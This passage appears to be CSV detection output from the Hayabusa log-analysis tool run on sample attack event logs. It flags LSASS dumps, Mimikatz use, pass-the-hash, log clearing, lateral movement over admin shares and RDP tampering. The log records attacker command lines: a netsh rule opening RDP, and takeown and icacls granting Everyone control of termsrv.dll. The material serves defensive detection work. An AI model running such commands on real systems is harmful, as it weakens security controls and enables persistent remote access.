\\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 